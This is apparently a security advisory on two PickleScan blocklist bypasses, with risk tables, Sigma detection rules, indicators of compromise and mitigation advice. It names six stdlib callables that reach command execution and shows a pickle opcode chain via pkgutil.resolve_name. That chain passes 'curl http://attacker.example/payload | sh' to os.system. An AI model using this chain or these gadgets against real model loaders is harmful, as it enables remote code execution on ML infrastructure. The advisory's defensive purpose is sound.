Executive Summary
What: Two critical vulnerabilities in PickleScan, a Python serialised-object security scanner used in ML pipelines and model-sharing platforms including HuggingFace Hub, render its blocklist-based protection entirely ineffective. The first advisory (GHSA-g38g-8gr9-h9xp, CVSS 9.8) identifies six Python standard library modules containing direct remote code execution paths that are absent from PickleScan's blocklist. The second advisory (GHSA-vvpj-8cmc-gx39, CVSS 10.0) describes a universal blocklist bypass via pkgutil.resolve_name that allows an attacker to dynamically resolve and invoke any callable in the Python runtime, regardless of blocklist contents.
So What: PickleScan is a commonly used scanner for evaluating serialised object safety before model loading, notably deployed by HuggingFace Hub for server-side scanning of uploaded models (GHSA-g38g-8gr9-h9xp). Organisations that rely on PickleScan as their sole defence against malicious serialised models have been operating with a false sense of security. Any model artefact scanned and marked "safe" by versions prior to 1.0.4 should be re-evaluated and not relied upon as solely validated, as an attacker could have embedded payloads using any of the unblocked modules or the universal bypass technique.
Now What: Upgrade PickleScan to version 1.0.4 or later immediately. Audit all models previously scanned and cleared by earlier versions. Consider defence-in-depth strategies that do not rely solely on blocklist-based scanning of serialised objects.
Risk Rating
| Dimension | Assessment | Rationale |
|---|---|---|
| Severity | Critical (CVSS 10.0 / 9.8) | Full remote code execution with no authentication or user interaction required (GHSA-vvpj-8cmc-gx39, GHSA-g38g-8gr9-h9xp) |
| Urgency | High | Fixed version available; exploitation requires only crafting a malicious serialised file |
| Scope | Wide | PickleScan is used for serialised object safety evaluation in ML pipelines and model-sharing platforms, including HuggingFace Hub (GHSA-g38g-8gr9-h9xp) |
| Confidence | High | Both advisories are vendor-confirmed with detailed technical descriptions of the bypass mechanisms |
| Business Impact | High | Arbitrary code execution on any system that loads a model artefact deemed "safe" by a vulnerable PickleScan version |
Affected Products
| Package | Registry | Vulnerable Versions | Fixed Version | Advisory |
|---|---|---|---|---|
| picklescan | PyPI | < 1.0.4 | 1.0.4 | GHSA-g38g-8gr9-h9xp, GHSA-vvpj-8cmc-gx39 |
Am I Affected?
- You use PickleScan (any version below 1.0.4) to validate serialised files before loading
- You load serialised model artefacts (.pkl, .pt, .pth, .bin) from external sources
- You operate an ML model registry or hub that uses PickleScan for ingestion scanning
- You have CI/CD pipelines that invoke PickleScan to gate model deployments
- You previously relied on PickleScan scan results to establish trust in third-party models
If any of the above apply, you are affected and should upgrade immediately.
Check your installed version:
pip show picklescan | grep Version
Abstract
PickleScan is a security scanner designed to detect dangerous function calls within Python serialised object files before they are deserialised. It operates on a blocklist model: it maintains a list of known-dangerous modules and callables (such as os.system, subprocess.Popen, and builtins.exec) and flags files that reference them. This research documents two distinct classes of failure in this approach, disclosed via GitHub Security Advisories.
The first class (GHSA-g38g-8gr9-h9xp) identifies six Python standard library modules that provide direct paths to operating system command execution but were absent from PickleScan's blocklist. These modules reach os.system() or subprocess.Popen through internal call chains that are not immediately obvious from their public API surface.
The second class (GHSA-vvpj-8cmc-gx39) is architecturally more severe: pkgutil.resolve_name can dynamically resolve any dotted Python name to its corresponding callable at runtime. Because pkgutil was not blocklisted, an attacker can use the serialisation opcode sequence STACK_GLOBAL + REDUCE to first resolve an arbitrary dangerous function (e.g., os:system) and then invoke it with attacker-controlled arguments -- bypassing the entire blocklist regardless of its contents. The advisory confirms eleven-plus RCE chains exploitable through this single bypass.
Together, these advisories demonstrate that blocklist-based scanning of serialised objects is structurally fragile: a single gap in coverage -- whether an omitted module or an unblocked meta-resolution function -- can negate the entire protection model.
Key Findings
-
Six unblocked stdlib RCE modules. PickleScan versions prior to 1.0.4 did not blocklist six Python standard library modules that provide direct command execution capabilities, including
uuid._get_command_stdout(which callssubprocess.Popen),_osx_support._read_output(which callsos.system()), andimaplib.IMAP4_stream(which callssubprocess.Popen(shell=True)) (GHSA-g38g-8gr9-h9xp). -
Universal blocklist bypass via pkgutil.resolve_name. The
pkgutil.resolve_namefunction accepts a dotted-name string (e.g.,os:system) and returns the corresponding Python callable. Becausepkgutilwas not blocklisted, an attacker can use serialisation opcodes to callresolve_namefirst to obtain any dangerous function, then invoke it in a second REDUCE operation -- entirely circumventing the blocklist architecture (GHSA-vvpj-8cmc-gx39). -
Eleven-plus confirmed RCE chains. The
pkgutil.resolve_namebypass is not limited to a single dangerous callable. The advisory confirms that eleven or more distinct remote code execution chains are reachable through this single bypass vector, making it a universal escape from blocklist-based scanning (GHSA-vvpj-8cmc-gx39). -
Blocklist architecture is structurally incomplete (assessment). The Python standard library contains hundreds of modules, many of which have internal functions that reach command execution through indirect call paths. A blocklist approach requires exhaustive enumeration of every such path -- a task that these two advisories demonstrate is inherently fragile and prone to omission.
-
False-negative scanning results degrade trust. Models previously scanned and cleared by vulnerable PickleScan versions should not be relied upon as solely validated. Any organisation that used scan-pass results as a security gate should re-evaluate the integrity of all models that passed through that gate.
Attack Flow
+---------------------+
| Attacker crafts |
| malicious serialised|
| object using |
| unblocked module or |
| pkgutil resolve_name|
| bypass |
+----------+----------+
|
v
+---------------------+
| File uploaded to |
| model registry / |
| shared via |
| repository |
+----------+----------+
|
v
+---------------------+
| PickleScan < 1.0.4 |
| scans file |
| --> PASS (no |
| blocklist match) |
+----------+----------+
|
v
+---------------------+
| Model marked as |
| "safe" by scanner |
| and cleared for |
| deployment |
+----------+----------+
|
v
+---------------------+
| Downstream system |
| loads model via |
| deserialisation |
| (e.g. torch.load) |
+----------+----------+
|
v
+---------------------+
| Malicious payload |
| executes: |
| - os.system() |
| - subprocess.Popen |
| - arbitrary code |
| via resolve_name |
+---------------------+
|
v
+---------------------+
| IMPACT: |
| Remote Code |
| Execution on |
| target system |
+---------------------+
MITRE ATLAS mapping: AML.T0010 (ML Supply Chain Compromise) -- attacker poisons a model artefact in the supply chain; AML.T0010.001 (AI Software) -- the compromised component is the security scanning tool itself.
Technical Details
7.1 Unblocked Standard Library Modules (GHSA-g38g-8gr9-h9xp)
PickleScan's blocklist architecture relies on matching the module and callable names referenced in serialisation opcodes against a curated deny list. The following six standard library modules were absent from this list, each providing a path to operating system command execution (GHSA-g38g-8gr9-h9xp):
uuid._get_command_stdout -- This internal function in the uuid module calls subprocess.Popen to execute shell commands as part of UUID generation on certain platforms. A serialised file can reference uuid._get_command_stdout directly via STACK_GLOBAL and REDUCE opcodes, passing attacker-controlled command strings.
_osx_support._read_output -- Used internally by Python's build system on macOS, this function calls os.system() to execute arbitrary commands. Despite being prefixed with an underscore (indicating internal use), it is fully importable and reachable via deserialisation.
_aix_support._read_cmd_output -- The AIX platform support module mirrors the macOS pattern, calling os.system() to read command output. Like _osx_support, it is importable and was not blocklisted.
_pyrepl.pager.pipe_pager -- Part of Python's REPL infrastructure, this function calls subprocess.Popen(shell=True) to pipe content through a system pager. The shell=True parameter makes it particularly dangerous, as it allows shell metacharacter injection.
imaplib.IMAP4_stream -- The IMAP client library's stream class calls subprocess.Popen(shell=True) to establish connections. An attacker can abuse this to execute arbitrary commands via the connection command string.
test.support.script_helper.assert_python_ok -- Part of Python's test infrastructure, this function spawns Python subprocesses. While typically excluded from production distributions, it remains importable in standard CPython installations.
7.2 Universal Bypass via pkgutil.resolve_name (GHSA-vvpj-8cmc-gx39)
The pkgutil.resolve_name bypass is architecturally distinct from the unblocked-module issue. Rather than exploiting gaps in the blocklist, it renders the entire blocklist concept irrelevant (GHSA-vvpj-8cmc-gx39).
The attack operates through a two-stage serialisation opcode sequence:
Stage 1 -- Resolve the dangerous callable:
STACK_GLOBAL pkgutil.resolve_name # Push resolve_name onto stack
MARK
SHORT_BINUNICODE "os:system" # Push the dotted-name string
TUPLE
REDUCE # Call resolve_name("os:system")
# Result: os.system function object
At this point, the virtual machine stack contains the os.system function object. PickleScan only inspects the STACK_GLOBAL and REDUCE opcodes for blocklisted module/callable pairs. It sees pkgutil.resolve_name -- which is not blocklisted -- and allows the operation.
Stage 2 -- Invoke the resolved callable:
# os.system is now on the stack from Stage 1
MARK
SHORT_BINUNICODE "curl http://attacker.example/payload | sh"
TUPLE
REDUCE # Call os.system("curl ...")
The second REDUCE calls whatever function was returned by Stage 1, with attacker-controlled arguments. The blocklist never sees os.system referenced in an opcode -- it was resolved dynamically at runtime.
7.3 CWE Classification
The advisories map to two complementary CWE weaknesses:
CWE-184(Incomplete List of Disallowed Inputs): The blocklist fails to enumerate all dangerous stdlib modules (GHSA-g38g-8gr9-h9xp).CWE-183(Permissive List of Allowed Inputs): The blocklist implicitly allows any module not explicitly denied, including the meta-resolution functionpkgutil.resolve_name(GHSA-vvpj-8cmc-gx39).CWE-693(Protection Mechanism Failure): Both advisories share this classification, reflecting that the scanning mechanism fails to achieve its stated security objective.
7.4 Architectural Root Cause (Assessment)
In our assessment, the fundamental weakness is the use of a deny-list (blocklist) rather than an allow-list for a security-critical function. The Python standard library contains hundreds of modules, and any module with even an indirect path to command execution, file system manipulation, or network access can be weaponised in a serialised payload. Maintaining an exhaustive deny-list requires continuous updates, as each new Python release may introduce new modules or internal functions with execution capabilities.
The pkgutil.resolve_name bypass elevates this from a coverage problem to an architectural one: even a theoretically complete blocklist of dangerous endpoints is insufficient if the blocklist does not also cover every possible meta-programming function that can resolve names dynamically.
Confidence & Validation
| Criterion | Status | Detail |
|---|---|---|
| Vendor Confirmed | Yes | PickleScan maintainer published fix in version 1.0.4 |
| GHSA Published | Yes | GHSA-g38g-8gr9-h9xp and GHSA-vvpj-8cmc-gx39 both published |
| CVE Assigned | No | No CVE IDs have been assigned; these are GHSA-only advisories |
| CVSS Score | 9.8 / 10.0 | Per GHSA-g38g-8gr9-h9xp (9.8) and GHSA-vvpj-8cmc-gx39 (10.0) respectively |
| Fix Available | Yes | PickleScan 1.0.4 on PyPI |
| PoC Status | Conceptual | Opcode sequences described in advisories; no weaponised exploit published |
| Exploitation in the Wild | Not confirmed | No public reports of active exploitation at time of publication |
Assessment confidence: HIGH. Both advisories are published by the package maintainer with detailed technical descriptions. The vulnerable code paths are verifiable through source code inspection. The fix version is published and installable.
Detection Signatures (Formal Rules)
Sigma Rule 1: Unblocked Module Imports in Serialised Files
title: PickleScan Bypass - Unblocked Stdlib RCE Modules in Serialised File
id: raxe-sigma-015-001
status: experimental
description: >
Detects serialised object files containing references to Python stdlib
modules that provide RCE paths but were absent from PickleScan
blocklist prior to version 1.0.4 (GHSA-g38g-8gr9-h9xp).
logsource:
category: file_analysis
product: picklescan
detection:
selection_modules:
opcode.module:
- 'uuid'
- '_osx_support'
- '_aix_support'
- '_pyrepl.pager'
- 'imaplib'
- 'test.support.script_helper'
selection_callables:
opcode.callable:
- '_get_command_stdout'
- '_read_output'
- '_read_cmd_output'
- 'pipe_pager'
- 'IMAP4_stream'
- 'assert_python_ok'
condition: selection_modules and selection_callables
level: critical
tags:
- attack.execution
- attack.t1059
- cwe.184
references:
- https://github.com/advisories/GHSA-g38g-8gr9-h9xp
falsepositives:
- Legitimate serialised files are unlikely to reference these internal modules
Sigma Rule 2: pkgutil.resolve_name in Opcode Stream
title: PickleScan Bypass - pkgutil.resolve_name Universal Blocklist Bypass
id: raxe-sigma-015-002
status: experimental
description: >
Detects serialised object files containing references to
pkgutil.resolve_name, which enables universal blocklist bypass by
dynamically resolving arbitrary Python callables at deserialisation
time (GHSA-vvpj-8cmc-gx39).
logsource:
category: file_analysis
product: picklescan
detection:
selection:
opcode.module: 'pkgutil'
opcode.callable: 'resolve_name'
condition: selection
level: critical
tags:
- attack.execution
- attack.defense_evasion
- attack.t1059
- cwe.183
references:
- https://github.com/advisories/GHSA-vvpj-8cmc-gx39
falsepositives:
- Extremely unlikely in legitimate serialised files; pkgutil.resolve_name has no valid use case in serialised model artefacts
Sigma Rule 3: Outdated PickleScan Version in CI/CD
title: Outdated PickleScan Version Detected in CI/CD Pipeline
id: raxe-sigma-015-003
status: experimental
description: >
Detects CI/CD pipeline logs or dependency manifests indicating
PickleScan versions prior to 1.0.4, which are vulnerable to
blocklist bypass (GHSA-g38g-8gr9-h9xp, GHSA-vvpj-8cmc-gx39).
logsource:
category: process_creation
product: ci_cd
detection:
selection_install:
CommandLine|contains:
- 'pip install picklescan'
- 'pip install picklescan=='
filter_safe_version:
CommandLine|contains:
- 'picklescan>=1.0.4'
- 'picklescan==1.0.4'
- 'picklescan==1.0.5'
- 'picklescan==1.0.6'
- 'picklescan==1.0.7'
- 'picklescan==1.0.8'
- 'picklescan==1.0.9'
- 'picklescan==1.1'
condition: selection_install and not filter_safe_version
level: high
tags:
- attack.initial_access
- attack.t1195.002
references:
- https://github.com/advisories/GHSA-g38g-8gr9-h9xp
- https://github.com/advisories/GHSA-vvpj-8cmc-gx39
falsepositives:
- Pinned versions in legacy environments that have compensating controls
Detection & Mitigation
Immediate Actions
Upgrade PickleScan. Install version 1.0.4 or later from PyPI:
pip install --upgrade picklescan>=1.0.4
Verify the installed version:
pip show picklescan | grep Version
Audit previously scanned models. Any model artefact that was scanned and cleared by PickleScan versions prior to 1.0.4 should be re-evaluated, as prior scan results cannot be relied upon as sole validation. Re-scan all such artefacts with the updated version. Pay particular attention to models sourced from public repositories, community contributions, or third-party vendors.
Review CI/CD pipelines. Identify all pipelines that invoke PickleScan and ensure they reference the fixed version. Update version pins in requirements.txt, pyproject.toml, and Docker images.
Defence-in-Depth Recommendations
Do not rely solely on blocklist-based scanning. Blocklist approaches are structurally incomplete for serialised object analysis. Consider supplementary controls:
- Allowlist-based scanning: Instead of blocking known-dangerous callables, only permit a defined set of safe callables. This inverts the security model and eliminates the coverage gap problem.
- Sandboxed deserialisation: Load untrusted serialised files in isolated environments (containers, VMs, or seccomp-restricted processes) where command execution has no impact.
- Format migration: Where feasible, migrate from Python serialisation to safer formats such as SafeTensors, ONNX, or other formats that do not support arbitrary code execution during loading.
- Network segmentation: Ensure systems that load model artefacts cannot reach external networks, limiting the impact of reverse-shell or data-exfiltration payloads.
Organisational Controls
- Establish a policy that all model artefacts from external sources undergo multi-layer validation, not solely PickleScan.
- Monitor for updates to PickleScan and similar scanning tools; blocklist-based tools will continue to require ongoing maintenance as new bypass techniques are discovered.
- Consider contributing to or adopting tools that use opcode-level analysis rather than simple name matching for serialised file inspection.
Indicators of Compromise
| Type | Indicator | Context |
|---|---|---|
| Behavioural | Serialised file references pkgutil.resolve_name in opcode stream |
Universal blocklist bypass (GHSA-vvpj-8cmc-gx39); no legitimate reason for this callable in serialised model artefacts |
| Behavioural | Serialised file references uuid._get_command_stdout |
Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); internal function with no valid serialisation use case |
| Behavioural | Serialised file references _osx_support._read_output |
Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); macOS build-system internal with os.system() call |
| Behavioural | Serialised file references _aix_support._read_cmd_output |
Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); AIX platform support internal with os.system() call |
| Behavioural | Serialised file references _pyrepl.pager.pipe_pager |
Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); REPL pager with subprocess.Popen(shell=True) |
| Behavioural | Serialised file references imaplib.IMAP4_stream |
Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); IMAP client with subprocess.Popen(shell=True) |
| Behavioural | Serialised file references test.support.script_helper |
Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); test infrastructure subprocess spawning |
| File | Serialised files (.pkl, .pt, .pth, .bin) containing STACK_GLOBAL opcode followed by pkgutil module reference |
Potential pkgutil.resolve_name bypass payload |
| Process | Unexpected child processes (sh, bash, curl, wget, nc) spawned by Python processes loading model artefacts | Post-exploitation activity following successful deserialisation RCE |
| Network | Outbound connections from model-loading infrastructure to unknown external hosts | Potential reverse shell or data exfiltration following deserialisation RCE |
Strategic Context
The Fragility of Blocklist-Based ML Security (RAXE Assessment)
These PickleScan advisories illustrate a broader pattern in ML supply chain security: the tools designed to protect the pipeline are themselves operating on architecturally fragile assumptions. In our assessment, blocklist-based scanning follows a well-understood anti-pattern in traditional application security -- web application firewalls (WAFs) that rely solely on regex-based blocklists have been routinely bypassed for decades. The ML security ecosystem is now encountering the same structural limitation.
Python Serialisation as a Persistent Attack Surface (RAXE Assessment)
Python's serialisation format remains prevalent in ML workflows (RAXE assessment), including as the default format for PyTorch model checkpoints. The deserialisation call is fundamentally an exec equivalent -- it can instantiate arbitrary objects and invoke arbitrary callables. As these advisories demonstrate, pre-load scanning alone cannot fully eliminate this risk as long as the format permits arbitrary code execution by design.
Safer Alternatives (RAXE Assessment)
Formats such as SafeTensors (developed by Hugging Face) and ONNX store tensor data without executable code paths, eliminating the deserialisation attack surface entirely. These PickleScan advisories reinforce the value of non-executable formats as a complementary control: where serialised object scanning is structurally fragile, format-level elimination of code execution removes the attack class altogether. The extent of industry migration to these formats is beyond the scope of this report.
Implications for ML Supply Chain Governance (RAXE Assessment)
Any organisation that treats a single blocklist-based scanner as a sufficient security control for model ingestion risks operating with a single point of failure. These advisories reinforce the need for layered model validation: format verification, allowlist-based opcode inspection, sandboxed loading, and provenance verification should all contribute to model trust decisions.
The CWE classifications assigned to these advisories -- CWE-184 (Incomplete List of Disallowed Inputs) and CWE-183 (Permissive List of Allowed Inputs) -- directly map to the allow-vs-deny list architectural debate. Security practitioners should treat these advisories as a case study in why deny-list approaches require continuous maintenance and are structurally inferior to allow-list models for security-critical functions.
References
-
GHSA-g38g-8gr9-h9xp -- PickleScan: 7 Python stdlib modules with direct RCE not in blocklist (
CVSS 9.8). https://github.com/advisories/GHSA-g38g-8gr9-h9xp -
GHSA-vvpj-8cmc-gx39 -- PickleScan: pkgutil.resolve_name universal blocklist bypass with eleven-plus confirmed RCE chains (CVSS 10.0). https://github.com/advisories/GHSA-vvpj-8cmc-gx39
-
MITRE ATLAS
AML.T0010-- ML Supply Chain Compromise. https://atlas.mitre.org/techniques/AML.T0010 -
MITRE ATLAS
AML.T0010.001-- ML Supply Chain Compromise: AI Software. https://atlas.mitre.org/techniques/AML.T0010.001 -
CWE-184-- Incomplete List of Disallowed Inputs. https://cwe.mitre.org/data/definitions/184.html -
CWE-183-- Permissive List of Allowed Inputs. https://cwe.mitre.org/data/definitions/183.html -
CWE-693-- Protection Mechanism Failure. https://cwe.mitre.org/data/definitions/693.html -
PickleScan on PyPI. https://pypi.org/project/picklescan/